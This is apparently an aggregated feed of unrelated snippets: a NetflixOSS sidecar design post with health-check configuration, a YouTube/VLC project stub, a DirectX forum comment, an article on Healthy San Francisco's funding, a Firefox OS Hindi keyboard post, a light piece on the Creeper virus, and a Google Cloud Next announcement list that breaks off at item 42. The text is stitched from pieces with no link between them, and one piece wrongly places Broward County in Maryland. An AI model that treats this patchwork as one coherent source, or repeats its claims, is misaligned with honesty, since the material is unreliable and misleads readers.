It would nice if the sidecar could provide an approximation of circuit breaking.  I believe this is impossible to do as "cleanly" as using NetflixOSS Hystrix natively (as this wouldn't require the user to write specific business logic to handle failures that reduce calls to the dependency), but it might be nice to have some level of guarantee of fast failure of scenarios using #3.  Also, all dynamic configuration of this function (timeouts, etc) should be considered.

8.  Application level metrics

It would be nice if the sidecar provided could allow the side-managed process to more easily publish application specific metrics to the metrics pipeline.  While every language likely already has a nice binding to systems like statsd/collectd, it might be worth making the interface to these systems common through the sidecar.  For NetflixOSS, this is done through Servo.

9. Manual GUI and programmatic control

We have found the need to sometimes quickly dive into a specific instance with human eyes.  Having a private web based UI is far easier than loading up ssh.  Also, if you want to script access to the functions and data collected by the sidecar, we would like a REST or even JMX interface to the control offered in the sidecar.

This all said, I started a quick project last week to create a sidecar that does some of these functions using NetflixOSS so it integrated cleanly into our existing IBM Cloud Services Fabric environment.  I decided to do it in github, so others can contribute.

By using Karyon as a base for the sidecar, I was able to get a few of the items on the list automatically (specifically #1, #2 partially and #9).  I started with the most basic sidecar in the trunk project.  Then I added two more things:


Consul style health checks:


In work leading up to this work Spencer Gibb pointed me to the sidecar agents checks that Consul uses (which they said they based on Nagios).  I based a similar set of checks for my sidecar.  You can see in this archaius config file how you'd configure them:

com.ibm.ibmcsf.sidecar.externalhealthcheck.enabled=true
com.ibm.ibmcsf.sidecar.externalhealthcheck.numchecks=1

com.ibm.ibmcsf.sidecar.externalhealthcheck.1.id=local-ping-healthcheckurl
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.description=Runs a script that curls the healthcheck url of the sidemanaged process
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.interval=10000
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.script=/opt/sidecars/curllocalhost.sh 8080 /
com.ibm.ibmcsf.sidecar.externalhealthcheck.1.workingdir=/tmp

com.ibm.ibmcsf.sidecar.externalhealthcheck.2.id=local-killswitch
com.ibm.ibmcsf.sidecar.externalhealthcheck.2.description=Runs a script that tests if /opt/sidecarscripts/killswitch.txt exists
com.ibm.ibmcsf.sidecar.externalhealthcheck.2.interval=30000
com.ibm.ibmcsf.sidecar.externalhealthcheck.2.script=/opt/sidecars/checkKillswitch.sh

Specifically you define a check as an external script that the sidecar executes and if the script returns a code of 0, the check is marked as healthy (1 = warning, otherwise unhealthy).  If all checks defined come back as healthy for greater than three iterations, the instance is healthy.  I have coded up some basic shell scripts that we'll likely give to all of our users (like curllocalhost.sh and checkkillswitchtxtfile.sh).  Once I had these checks being executed by the sidecar, it was pretty easy to change the Karyon/Eureka HealthCheckHandler class to query the CheckManager logic I added.


Integration with Dynamic Configuration Management


We believe most languages can easily register events based on files changing and can easily read properties files.  Based on this, I added another feature configured this archiaus config file:

com.ibm.ibmcsf.sidecar.dynamicpropertywriter.enabled=true
com.ibm.ibmcsf.sidecar.dynamicpropertywriter.file.template=/opt/sidecars/appspecific.properties.template
com.ibm.ibmcsf.sidecar.dynamicpropertywriter.file=/opt/sidecars/appspecific.properties

What this says is that a user of the sidecar puts all of the properties they care about in the file.template properties file and then as configuration is dynamically updated in Archaius the sidecar sees this and writes out a copy to the main properties file with the values filled in.

With these changes, I think we now have a pretty solid story for #1, #2, #6 and #9.  I'd like to next focus on #3, #4, and #7 adding a Zuul and Hystrix based sidecar process but I don't have users (yet) pushing for these functions.  Also, I should note that the code is a proof of concept and needs to be hardened as it was just a side project for me.

PS.  I do want to make it clear that while this sidecar approach could be used for Java services (as opposed to languages that don't have NetflixOSS bindings), I do not advocate moving these functions to external to your Java implementation.  There are places where offering this function in a side-car isn't as "excellent" operationally and more close to "good enough".  I'll let it to the reader to understand these tradeoffs.  However, I hope that work in this microservice sidecar space leads to easier NetflixOSS adoption in non-Java environments.

PPS.  This sidecar might be more useful in the container space as well at a host level.  Taking the sidecar and making it work across multiple single process instances on a host would be an interesting extension of this work.



          Listen YouTube music on Android device with QPython and VLC - StreaMe        

Get the source and other information on GitHub


Usage example



Article in progress




Ethical considerations

YouTube is a fantastic service that allows everyone to see video from all over the world and listen to their favorite music, and with rare exceptions, is open to all.
Open means that everyone can access it without paying, but the music is not free.
To provide this service, Googleinvests in infrastructure, development, security, research, and of course reward artists for their work.
The only thing that is required is to pay attention to some advertisers.
Some do not like it, some think that there are other ways, but the truth is that the internet has grown thanks to advertising. it went well for 20 years, will be fine for another 20.

Practical considerations

Play store is full of applications that allow you to play and download music from youtube.
Whygoogle doesn't remove these apps?
Because almost all of these applications are free but full of adverts, andGoogle obviously takes his percentage.


However, the purpose of this project is not to steal from the pockets of google or to compete with Spotify or Deezer.
It's only a proof of concept of what you can do with a few lines of code and a bit of DIY philosophy

Requirements



If you are able to compile VLC from source with this commit
You can see video Title in VLC instead of a long ugly URL



          RE: Purpose of DirectX        
When the Fahrenheit project started, OpenGL had only recently become an API usable for PC games, and was mainly used with expensive GPUs for business applications (and this is why it was in NT, MS' business OS, in the first place). DirectX had been used in games along with proprietary APIs from various GPU vendors. GLQuake came out the same year that work on the Fahrenheit project began and was basically a proof of concept because John Carmack wasn't satisfied with writing to multiple GPU vendor APIs. The 3dfx Voodoo Graphics was basically the only PC GPU that could run it well, and long after GLQuake's release, GPU vendors were trying to get miniGL drivers working. SGI didn't need any direct help from MS to lose marketshare. The constant performance improvements to PCs virtually killed SGI along with a lot of their talent starting or joining PC GPU companies. As with proprietary Unix in general, people that used to require expensive, high-end systems started looking at the PC as a cheaper alternative.
          'Proof of Concept' Study Points to Possible Link Between Aerobic Exercise and Improvement in Cognitive Function in Patients With Vascular-Based Impairment        
Could aerobic activity actually improve cognitive function in older adults with vascular-based impairments?
          San Francisco’s universal health plan reaches tens of thousands, but rests on unstable funding        

Coordination and prevention improve care, but as businesses resist, some costs are borne by one-time grants and struggling clinics

Four years ago, San Francisco launched a grand experiment, becoming the first city in the nation to offer comprehensive health care to its growing ranks of uninsured.

Stitching together two-dozen neighborhood health clinics and an array of hospitals, the city bet that two reforms — emphasis on primary care and a common electronic enrollment system — could improve outcomes and buffer the city against soaring health care costs.

By many measures, San Francisco’s effort to provide universal health care has been a huge success and has won national accolades. The initiative, Healthy San Francisco, has over time treated more than 100,000 city residents. Many who went for years without health insurance now receive the kind of preventive and specialty care usually associated with private insurance.

But the city’s grand plan has not solved the central problem dogging health care across the country: figuring out who pays for it.

While the Department of Public Health has kept its own spending on the program at under $100 million a year — about the same amount it spent on indigent care before Healthy San Francisco’s 2007 launch — it has spread an additional $78 million in costs to businesses, patients, the federal government and the health care providers themselves.

The program relies on ample, but not perpetual, federal grants for health innovation, tied to preparing for President Obama’s health initiatives that may be derailed by the U.S. Supreme Court next spring or a Republican administration after 2012. As national political and economic winds change, the city may not see the soft landing it expected from the federal reforms in the next few years.

With low payments from patients and declining dollars from employers under a new health care spending requirement, the plan’s local financing remains a challenge. Especially when the city has faced deficits of more than $300 million for each of the last three years.

Participating nonprofit community clinics in the network have been shouldering part of the financial burden. That may be a problem in an economy where health care costs are rising twice as fast as inflation. Some clinics say they are tapped out, and the $114 per-patient per-year reimbursement they get from Healthy San Francisco doesn’t come anywhere close to covering costs.

“The program is very, very important,” said Karen Hill, administrative director of Glide Health Services, a large, busy nonprofit community health clinic in the Tenderloin whose base of 3,000 patients includes 1,500 Healthy San Francisco members. “But I think we should recognize that it does not pay for the care of the population.”

At last count, Healthy San Francisco covers 54,348 patients, about two-thirds of the estimated 82,000 San Francisco adults who lack insurance, according to a September report from Mathematica Policy Research of Princeton, New Jersey. (Estimates range widely from 64,000 to 90,000 uninsured adults aged 18 to 64.)
In a survey of patient satisfaction, 94 percent said they were satisfied with the medical care they received through the program.

But clinic directors say that while the program has been great for patients, the clinics themselves struggle to deliver care to ever-growing numbers of people. Some clinics have seen their patient base grow by a third since 2007.

Healthy San Francisco has laudable goals, said Ricardo Alvarez, medical director of the Mission Neighborhood Health Center, and “has expanded care to a vulnerable underserved population.”

But for clinics to make it work, Alvarez said, “it is challenging financially.”

Several clinics, such as Lyon-Martin Health Services in Hayes Valley, have stopped taking more Healthy San Francisco patients. The center was already under financial stress this year, and announced earlier this year it had been on the brink of bankruptcy.

So as the Obama administration prepares to roll out federal health reform by 2014, cities and states look to San Francisco for proof of concept: They're finding the plan here offers ingredients for success, but not a complete answer.

“Healthy San Francisco is a model for health care delivery but not for payment,” said Stephen Shortell, the Dean of the University of California-Berkeley’s School of Public Health.

But Alvarez, of the Mission clinic, said San Francisco had little choice but to innovate.

“I think the fact that Healthy San Francisco exists is, in part, a local response to a complex problem,” he said. “The fact that we don’t have a comprehensive national healthcare program means certain localities will attempt to find their own solutions.”

Ahead of the curve

Healthy San Francisco has scored some nationally recognized successes. In drawing two-thirds of the city’s uninsured into its care, it has shrunk the number of people without some form of health care to 3 percent of the city’s population.

The program is built around a “patient-centered” primary care model that is in vogue in medical reform circles. New enrollees are primarily very poor, though any city resident making less than 500 percent of the poverty level and without proper insurance for three months can apply.

Participants choose one of 35 health clinics around the city as their “medical home.” At the clinic, they are assigned a team of providers: a doctor, a nurse practitioner and assistants who handle their visits and coordinate referrals to specialists or for hospitalization.

The theory is that by offering patients a regular doctor or medical team who might get to know them, in a place that is familiar, they will seek care before problems become acute. Numerous studies have shown that preventive care such as mammograms and cholesterol checks can detect early signs of disease before they become more difficult and costly to treat. Uninsured patients often put off tests and preventive care to avoid out-of-pocket expenses.

Shifting to the patient-centered model has also dramatically cut the use of city emergency rooms for routine care by the program’s participants. Proponents say that in the long run emergency room “diversion” — catching illness before it becomes acute — has the potential to save the city millions of dollars a year because emergency care is inevitably more expensive.

Keeping better track

Healthy San Francisco dramatically improves patient tracking by using a citywide database. Each patient’s enrollment and eligibility status is entered into one place visible to the entire network of providers. Now, a patient does not need to be re-enrolled if she needs hospitalization or to see a specialist elsewhere. If she shows up at a different clinic, she will be redirected to her home clinic. Administrators say this cuts down on duplicative care and wasted time. Patients used to hop from clinic to clinic, often carrying their own eligibility documents with them.

“We do believe it is a model,” said Tangerine Brigham, director of Healthy San Francisco and a deputy director of the Department of Health. “The medical home, the use of one standardized eligibility and enrollment system, getting all providers that are caring for this population to focus on one network, are things that should happen.”

Roland Pickens, the chief operating officer of San Francisco General Hospital — the county hospital where three-quarters of Healthy San Francisco patients go if they need hospitalization — said the program “has been a good change,” bolstering primary care, resulting in 30 percent fewer visits to the emergency room by uninsured adults and reducing the time and money spent on administrative tasks.

Alvarez relates the story of a woman named Isabel (he could not provide her last name due to medical privacy issues) who came to Mission Neighborhood Health Center with a psychotic disorder, uncontrolled diabetes and eye trouble. A behavioral health specialist calmed her down, and a physician tested her blood sugars, prescribed diabetes medication and gave her an appointment to see an ophthalmologist.

Because she was enrolled in Healthy San Francisco, all this cost the clinic a few hundred dollars, of which the city was billed $114. Had she gone to the emergency room, as many uninsured people did for routine problems before, it would have cost about $1,800, clinic officials estimated.

“Patients know this is their home, providers know this is our patient. It improves health outcomes,” said Albert Yu, medical director of Chinatown Public Health Center, the first Healthy San Francisco participating clinic. “Previously, patients would go from center to center, or the medical facility might not recognize that she is our patient. She is just coming in for a cold and therefore I can ignore the mammogram referral.”

For patients, it is often a godsend.

“It gives you the option to have medical care and everybody deserves that," said Carol Graham, who lost her job of 17 years, and with it private health insurance, before signing up for Healthy San Francisco. “Oakland doesn’t have this.” She noted that her sister, who lives across the bay, does not have access to a similar program. “I was surprised by how life can be different just by crossing the bridge.”

For Megan Alyse, signing up for Healthy San Francisco allowed her to continue to write her doctoral thesis when she was no longer connected with a school and thus without insurance. “I paid hardly anything and was able to see a doctor,” she said.

Assessing Newsomcare

In 2006, then-Mayor Gavin Newsom announced a plan hatched by then-Public Health Director Mitch Katz and then-Supervisor Tom Ammiano to cover the uninsured, albeit only within city limits. The left-leaning Board of Supervisors rallied in unanimous approval.

What existed before was a safety-net system of scattered clinics and emergency rooms that cared for whoever walked in the door. They typically treated people for whatever episode brought them in, patched them up and sent them on their way. Emergency rooms were a chaotic jumble of the sick and not-so-sick. Many people didn’t get the care they needed because they didn’t know where to go.

City leaders needed a way to make the plan work economically. And they needed to prevent employers from seeing it as a chance to cut costs by dropping private health insurance and making the city pick up the tab. In part, that meant shifting some responsibility to employers — an idea that if not uniquely popular in San Francisco is certainly not shared nationwide, as the political climate turns toward austerity.

The city coupled Healthy San Francisco with an ordinance requiring employers to spend a minimum of $1.37 per hour per worker on employee health care. Businesses can do one of three things to meet the requirement: buy private insurance for their employees, contribute to Healthy San Francisco, or pay into a medical reimbursement account for employees who live outside the city or earn too much to qualify.

The Health Care Security Ordinance requires businesses with 20 or more workers and nonprofits with 50 or more employees to spend at least $2,849 per year for a full-time employee on health care. For larger employers the rate is $4,285.

Eighty percent of employers have chosen to satisfy the requirement by buying private insurance. The rest use the “city option” — Healthy San Francisco or the reimbursement accounts. But in the last three years, the contributions to Healthy San Francisco have been shrinking, making employer support of the program uncertain.

It adds up, for now

While the total cost of the program has stayed within the Newsom administration’s $200-million-a-year forecast, where that money comes from does not look like the projections. A plan that was supposed to be financed in large part by employers and participants is not seeing that money.

The employer contribution raised relatively modest revenues. Of Healthy San Francisco’s total $177 million budget in the last fiscal year, businesses covered just $12.9 million, or about 7 percent. When city officials created the program they envisioned businesses covering $30 million to $40 million, or at least 15 percent of the cost.

The city’s General Fund picked up nearly eight times that amount — $99.7 million. The contributions of individuals opting to buy Healthy San Francisco for themselves contribute just $5.9 million or a bit more than 3 percent of total costs.

A big chunk of the program is covered by the federal government through a $27.4 million annual grant awarded in 2007 for local health care initiatives that expired in July.

Another $11 million of that charity care was expended by hospitals not owned by the county. The independent nonprofit community clinics — many of them barebones operations where volunteers do some of the administrative work and constant fundraising is the name of the game — contributed $16 million, mostly from federal grants for taking care of the indigent.

Without that extra $55.4 million, mostly from federal sources, the program would be hard to sustain.

U.S. subsidies uncertain

At some point, federal funding to Healthy San Francisco could disappear altogether as federal health reform is fully implemented — or if it is scrapped by a future Republican administration.

“They will have to rethink where the money is coming from,” said Dylan Roby, a research scientist and assistant professor at the University of California-Los Angeles’ Center for Health Policy Research. “They won’t have federal dollars anymore.”

But city officials said the plan all along was that the need for Healthy San Francisco would diminish later this decade with the phase-in of national health care reforms passed in 2010.

Under the Obama reforms, more of the currently uninsured population will get access to insurance through two programs: an expansion of Medicaid and the Health Insurance Exchanges, through which individuals and small businesses can buy insurance more easily. Brigham, the Healthy San Francisco director, said she expects thousands of patients to leave the system with these reforms.

“We don’t think it’s a bad thing that we’ll be serving fewer people,” Brigham said. “We’ve always said from the beginning that insurance is preferable to Healthy San Francisco. HSF is not insurance, it’s access.”

She estimated that 60 percent of Healthy San Francisco’s enrollees would eventually leave under the federal plan. In the meantime, she is not that concerned that nonprofit community clinics are footing more of the bill for treating Healthy San Francisco patients because they are getting federal grants. Before the city program, they got little if any local government money, she said.

Less from business, patients

What does concern some city officials, particularly at the Office of Labor Standards Enforcement, is the shrinking financial support by businesses.

The amount collected from employers choosing Healthy San Francisco for some of their employees is small, and gradually falling. The $12.9 million employer contributions last year were down from $13.9 the year before, and off by almost one-third from two years earlier, when employers contributed $18.2 million.

Healthy San Francisco’s budget also is not getting much help from individuals paying into the system. Revenue from individuals choosing Healthy San Francisco as an alternative to insurance in the 2010-2011 fiscal year was only $5.7 million, up $5 million from the year before and $3.2 million the year before that.

By and large, people enrolling in Healthy San Francisco are poor. Even though the city extended the program to uninsured people who make up to 500 percent of federal poverty level — a gross income of $50,450 for an individual, at which level they are asked to contribute a modest $150 a month, plus co-pays — the program has almost no participants in that bracket. Two-thirds of enrollees live at or below the poverty level and pay nothing. Another 26 percent are within 200 percent of poverty, and pay $20 a month — far below the cost of a doctor’s visit.

Experiments nationwide

At least one local government, Broward County in Maryland, has decided to replicate Healthy San Francisco exactly, while many other localities are studying it. Massachusetts and Vermont also have created their own permutations of “universal” health care.

In California the tab for safety-net care falls to counties, which run hospitals largely to take care of the poor and under- or uninsured. (San Francisco is both a city and a county.) The uninsured often go to the nearest hospital’s emergency room, which cannot legally turn anyone away for lack of funds.

The need surely has not gone away. U.S. Census Bureau statistics indicate that the number of uninsured people has climbed during the recession, in San Francisco and nationwide. It estimates 96,107 San Franciscans, including children and the elderly, lack insurance — about 12 percent of the city’s population. So unless and until national reforms take effect, Healthy San Francisco should expect more people seeking help, especially if the economy continues to sputter.

Nationwide 49.7 million people are uninsured — one in every six people. Spending on health care continues to far outpace inflation. U.S. health care spending grew 4 percent in 2009, to $2.5 trillion, or about $8,000 for each person, according to the Department of Health and Human Services. The growth is believed to be accelerating and is projected to average 6 percent a year between 2010 and 2019. Health care expenditures now account for 17 percent of gross domestic product, a measure of spending on all goods and services in the country.

“The U.S. has the most expensive health care system in the world, with health status indicators that are, at best, only average in comparison with the less costly health systems of other countries,” said Shortell of U.C. Berkeley’s School of Public Health, in a recent paper published in the journal Public Health Reviews. “Thus the pressure to provide more cost-effective care is particularly intense.”

Shortell said the advent of patient-centered medical homes could provide more cost-effective delivery of health care, especially if combined with payments that reward health providers for outcomes, rather than charge fees for services rendered. This is what Healthy San Francisco is trying to achieve.

“Studies show medical homes are associated with higher quality at the same or lower costs,” he said. “There’s been half a dozen studies showing that. And the federal government is encouraging medical homes.”

Shortell said Healthy San Francisco seems to be successful in addressing national concerns about costs on a local level by coordinating clinics and hospitals. But he said the city’s reliance on the federal government for much of its money, either directly or through subsidized clinics, was not a big deal. That is to be expected as local governments struggle to figure out the new mix of who pays for the uninsured.


          Indian Language support on Firefox OS using jquery.ime        
Firefox OS is coming! With the announcement of the $25 phone at MWC, there is much excitement and wait for the launch of Firefox OS phones in India.
But the software is far from feature-complete for the complex Indian market. A major task for the platform to be a "People's phone" is to know their languages!
Localisation of Firefox OS is a very big task up ahead. One of the tasks is user input in Native Indian languages. Support for most Indian languages are already present on platforms like Android.

I've recently been experimenting with Language Computing using a few SMC projects. So I thought why not build an Indian Language IME for Firefox OS. I also proposed the idea to SMC for the GSoC program.
The idea was welcomed by the mentors and one of the mentors, Anivar, asked me to do a feasibility study on the use of jquery.ime library.

The jquery.ime is an input method editor library supporting more than 135 input methods across more than 62 languages.

While jQuery is a great framework to kickstart web development with multiple browser support without any worries, there arises use specific use cases when this may not be required. The biggest example is its use in Firefox OS. Since the OS runs Gecko, there is no use of the extra Javascript code for cross-browser support. I am planning to port the jquery.ime library to plain vanilla Javascript. This would enable developers using modern frameworks like AngularJS and EmberJS to take advantage of the ime's without having a dependency on the jQuery library.


For testing the feasibility, I thought of quickly hacking up an IME for Hindi, which is the Indian Language I'm most comfortable with. Implementation relating to the OS was easy enough, and I tweaked the Keyboard settings to include 'Hindi' keyboard as one of the options.


The IME is not perfect as such and there are a lot of problems in the input, especially when the words become large. I 'm sure that can be sorted out and since I'm not familiar with IME's it would be a good learning point as well.

Fortunately, there is no need of resetting Gaia on my Keon again and again and testing can be done on Firefox Nightly. Here's a demo of the Hindi IME.








The code structure of jQuery.ime is very neatly organised and this quick hack definitely means that with proper manipulation, jQuery.ime would enable not just Indian Language support but most of the 62 different languages supported by the library in Firefox OS.

The major task in the project will be to convert all the jQuery specific code into JavaScript, while maintaining cross browser support (for use in other projects).
After that I feel it will be relatively easier to introduce most of the input methods available in jQuery.ime in Firefox OS. There is a lot of routine work to be done with all the different IME's, so I'm also planning on a Automatic porting tool, written in Python to generate the required folders and populate them with the requisite files containing Patterns of the various languages.

Looking forward to the project.

Update : Although the IME is not complete, the Proof of Concept code is available here : https://gist.github.com/psbots/aa1887f0a53c61611061



          Happy Birthday viruses        
y_spam

Malware becomes a 40 something
It is the 40th Birthday of the world's first computer virus. In the 1950s genius mathematician John Von Neumann in the early 50s worked out that it was possible to create a self replicating piece of computer code. However no one really took that seriously after all who wanted their in basket full with penis spam.

But in 1971, Bob Thomas, an employee of a company working on building ARPANET, the Internet’s daddy, managed to write a bit of code to do just that. It was all a bit of a laugh really. Creeper looked for a machine on the network, transfers to it, displays the message “I’m the creeper, catch me if you can!” and starts over, thereby hoping from system to system.

Of course the ARPANET person did not know that his proof of concept virus would prove that computer viruses and the Internet internet go together like love and marriage. Since Creeper was written malware instances have rocketed from 1,300 in 1990, to 50,000 in 2000, to over 200 million in 2010.

More here.



          100 announcements (!) from Google Cloud Next '17        

San Francisco — What a week! Google Cloud Next ‘17 has come to the end, but really, it’s just the beginning. We welcomed 10,000+ attendees including customers, partners, developers, IT leaders, engineers, press, analysts, cloud enthusiasts (and skeptics). Together we engaged in 3 days of keynotes, 200+ sessions, and 4 invitation-only summits. Hard to believe this was our first show as all of Google Cloud with GCP, G Suite, Chrome, Maps and Education. Thank you to all who were here with us in San Francisco this week, and we hope to see you next year.

If you’re a fan of video highlights, we’ve got you covered. Check out our Day 1 keynote (in less than 4 minutes) and Day 2 keynote (in under 5!).

One of the common refrains from customers and partners throughout the conference was “Wow, you’ve been busy. I can’t believe how many announcements you’ve had at Next!” So we decided to count all the announcements from across Google Cloud and in fact we had 100 (!) announcements this week.

For the list lovers amongst you, we’ve compiled a handy-dandy run-down of our announcements from the past few days:

100-announcements-15

Google Cloud is excited to welcome two new acquisitions to the Google Cloud family this week, Kaggle and AppBridge.

1. Kaggle - Kaggle is one of the world's largest communities of data scientists and machine learning enthusiasts. Kaggle and Google Cloud will continue to support machine learning training and deployment services in addition to offering the community the ability to store and query large datasets.

2. AppBridge - Google Cloud acquired Vancouver-based AppBridge this week, which helps you migrate data from on-prem file servers into G Suite and Google Drive.

100-announcements-4

Google Cloud brings a suite of new security features to Google Cloud Platform and G Suite designed to help safeguard your company’s assets and prevent disruption to your business: 

3. Identity-Aware Proxy (IAP) for Google Cloud Platform (Beta) - Identity-Aware Proxy lets you provide access to applications based on risk, rather than using a VPN. It provides secure application access from anywhere, restricts access by user, identity and group, deploys with integrated phishing resistant Security Key and is easier to setup than end-user VPN.

4. Data Loss Prevention (DLP) for Google Cloud Platform (Beta) - Data Loss Prevention API lets you scan data for 40+ sensitive data types, and is used as part of DLP in Gmail and Drive. You can find and redact sensitive data stored in GCP, invigorate old applications with new sensitive data sensing “smarts” and use predefined detectors as well as customize your own.

5. Key Management Service (KMS) for Google Cloud Platform (GA) - Key Management Service allows you to generate, use, rotate, and destroy symmetric encryption keys for use in the cloud.

6. Security Key Enforcement (SKE) for Google Cloud Platform (GA) - Security Key Enforcement allows you to require security keys be used as the 2-Step verification factor for enhanced anti-phishing security whenever a GCP application is accessed.

7. Vault for Google Drive (GA) - Google Vault is the eDiscovery and archiving solution for G Suite. Vault enables admins to easily manage their G Suite data lifecycle and search, preview and export the G Suite data in their domain. Vault for Drive enables full support for Google Drive content, including Team Drive files.

8. Google-designed security chip, Titan - Google uses Titan to establish hardware root of trust, allowing us to securely identify and authenticate legitimate access at the hardware level. Titan includes a hardware random number generator, performs cryptographic operations in the isolated memory, and has a dedicated secure processor (on-chip).

100-announcements-7

New GCP data analytics products and services help organizations solve business problems with data, rather than spending time and resources building, integrating and managing the underlying infrastructure:

9. BigQuery Data Transfer Service (Private Beta) - BigQuery Data Transfer Service makes it easy for users to quickly get value from all their Google-managed advertising datasets. With just a few clicks, marketing analysts can schedule data imports from Google Adwords, DoubleClick Campaign Manager, DoubleClick for Publishers and YouTube Content and Channel Owner reports.

10. Cloud Dataprep (Private Beta) - Cloud Dataprep is a new managed data service, built in collaboration with Trifacta, that makes it faster and easier for BigQuery end-users to visually explore and prepare data for analysis without the need for dedicated data engineer resources.

11. New Commercial Datasets - Businesses often look for datasets (public or commercial) outside their organizational boundaries. Commercial datasets offered include financial market data from Xignite, residential real-estate valuations (historical and projected) from HouseCanary, predictions for when a house will go on sale from Remine, historical weather data from AccuWeather, and news archives from Dow Jones, all immediately ready for use in BigQuery (with more to come as new partners join the program).

12. Python for Google Cloud Dataflow in GA - Cloud Dataflow is a fully managed data processing service supporting both batch and stream execution of pipelines. Until recently, these benefits have been available solely to Java developers. Now there’s a Python SDK for Cloud Dataflow in GA.

13. Stackdriver Monitoring for Cloud Dataflow (Beta) - We’ve integrated Cloud Dataflow with Stackdriver Monitoring so that you can access and analyze Cloud Dataflow job metrics and create alerts for specific Dataflow job conditions.

14. Google Cloud Datalab in GA - This interactive data science workflow tool makes it easy to do iterative model and data analysis in a Jupyter notebook-based environment using standard SQL, Python and shell commands.

15. Cloud Dataproc updates - Our fully managed service for running Apache Spark, Flink and Hadoop pipelines has new support for restarting failed jobs (including automatic restart as needed) in beta, the ability to create single-node clusters for lightweight sandbox development, in beta, GPU support, and the cloud labels feature, for more flexibility managing your Dataproc resources, is now GA.

100-announcements-9

New GCP databases and database features round out a platform on which developers can build great applications across a spectrum of use cases:

16. Cloud SQL for Postgre SQL (Beta) - Cloud SQL for PostgreSQL implements the same design principles currently reflected in Cloud SQL for MySQL, namely, the ability to securely store and connect to your relational data via open standards.

17. Microsoft SQL Server Enterprise (GA) - Available on Google Compute Engine, plus support for Windows Server Failover Clustering (WSFC) and SQL Server AlwaysOn Availability (GA).

18. Cloud SQL for MySQL improvements - Increased performance for demanding workloads via 32-core instances with up to 208GB of RAM, and central management of resources via Identity and Access Management (IAM) controls.

19. Cloud Spanner - Launched a month ago, but still, it would be remiss not to mention it because, hello, it’s Cloud Spanner! The industry’s first horizontally scalable, globally consistent, relational database service.

20. SSD persistent-disk performance improvements - SSD persistent disks now have increased throughput and IOPS performance, which are particularly beneficial for database and analytics workloads. Read these docs for complete details about persistent-disk performance.

21. Federated query on Cloud Bigtable - We’ve extended BigQuery’s reach to query data inside Cloud Bigtable, the NoSQL database service for massive analytic or operational workloads that require low latency and high throughput (particularly common in Financial Services and IoT use cases).

100-announcements-11

New GCP Cloud Machine Learning services bolster our efforts to make machine learning accessible to organizations of all sizes and sophistication:

22.  Cloud Machine Learning Engine (GA) - Cloud ML Engine, now generally available, is for organizations that want to train and deploy their own models into production in the cloud.

23. Cloud Video Intelligence API (Private Beta) - A first of its kind, Cloud Video Intelligence API lets developers easily search and discover video content by providing information about entities (nouns such as “dog,” “flower”, or “human” or verbs such as “run,” “swim,” or “fly”) inside video content.

24. Cloud Vision API (GA) - Cloud Vision API reaches GA and offers new capabilities for enterprises and partners to classify a more diverse set of images. The API can now recognize millions of entities from Google’s Knowledge Graph and offers enhanced OCR capabilities that can extract text from scans of text-heavy documents such as legal contracts or research papers or books.

25. Machine learning Advanced Solution Lab (ASL) - ASL provides dedicated facilities for our customers to directly collaborate with Google’s machine-learning experts to apply ML to their most pressing challenges.

26. Cloud Jobs API - A powerful aid to job search and discovery, Cloud Jobs API now has new features such as Commute Search, which will return relevant jobs based on desired commute time and preferred mode of transportation.

27. Machine Learning Startup Competition - We announced a Machine Learning Startup Competition in collaboration with venture capital firms Data Collective and Emergence Capital, and with additional support from a16z, Greylock Partners, GV, Kleiner Perkins Caufield & Byers and Sequoia Capital.

100-announcements-10

New GCP pricing continues our intention to create customer-friendly pricing that’s as smart as our products; and support services that are geared towards meeting our customers where they are:

28. Compute Engine price cuts - Continuing our history of pricing leadership, we’ve cut Google Compute Engine prices by up to 8%.

29. Committed Use Discounts - With Committed Use Discounts, customers can receive a discount of up to 57% off our list price, in exchange for a one or three year purchase commitment paid monthly, with no upfront costs.

30. Free trial extended to 12 months - We’ve extended our free trial from 60 days to 12 months, allowing you to use your $300 credit across all GCP services and APIs, at your own pace and schedule. Plus, we’re introduced new Always Free products -- non-expiring usage limits that you can use to test and develop applications at no cost. Visit the Google Cloud Platform Free Tier page for details.

31. Engineering Support - Our new Engineering Support offering is a role-based subscription model that allows us to match engineer to engineer, to meet you where your business is, no matter what stage of development you’re in. It has 3 tiers:

  • Development engineering support - ideal for developers or QA engineers that can manage with a response within four to eight business hours, priced at $100/user per month.
  • Production engineering support provides a one-hour response time for critical issues at $250/user per month.
  • On-call engineering support pages a Google engineer and delivers a 15-minute response time 24x7 for critical issues at $1,500/user per month.

32. Cloud.google.com/community site - Google Cloud Platform Community is a new site to learn, connect and share with other people like you, who are interested in GCP. You can follow along with tutorials or submit one yourself, find meetups in your area, and learn about community resources for GCP support, open source projects and more.

100-announcements-8

New GCP developer platforms and tools reinforce our commitment to openness and choice and giving you what you need to move fast and focus on great code.

33. Google AppEngine Flex (GA) - We announced a major expansion of our popular App Engine platform to new developer communities that emphasizes openness, developer choice, and application portability.

34. Cloud Functions (Beta) - Google Cloud Functions has launched into public beta. It is a serverless environment for creating event-driven applications and microservices, letting you build and connect cloud services with code.

35. Firebase integration with GCP (GA) - Firebase Storage is now Google Cloud Storage for Firebase and adds support for multiple buckets, support for linking to existing buckets, and integrates with Google Cloud Functions.

36. Cloud Container Builder - Cloud Container Builder is a standalone tool that lets you build your Docker containers on GCP regardless of deployment environment. It’s a fast, reliable, and consistent way to package your software into containers as part of an automated workflow.

37. Community Tutorials (Beta)  - With community tutorials, anyone can now submit or request a technical how-to for Google Cloud Platform.

100-announcements-9

Secure, global and high-performance, we’ve built our cloud for the long haul. This week we announced a slew of new infrastructure updates. 

38. New data center region: California - This new GCP region delivers lower latency for customers on the West Coast of the U.S. and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

39. New data center region: Montreal - This new GCP region delivers lower latency for customers in Canada and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

40. New data center region: Netherlands - This new GCP region delivers lower latency for customers in Western Europe and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

41. Google Container Engine - Managed Nodes - Google Container Engine (GKE) has added Automated Monitoring and Repair of your GKE nodes, letting you focus on your applications while Google ensures your cluster is available and up-to-date.

42. 64 Core machines + more memory - We have doubled the number of vCPUs you can run in an instance from 32 to 64 and up to 416GB of memory per instance.

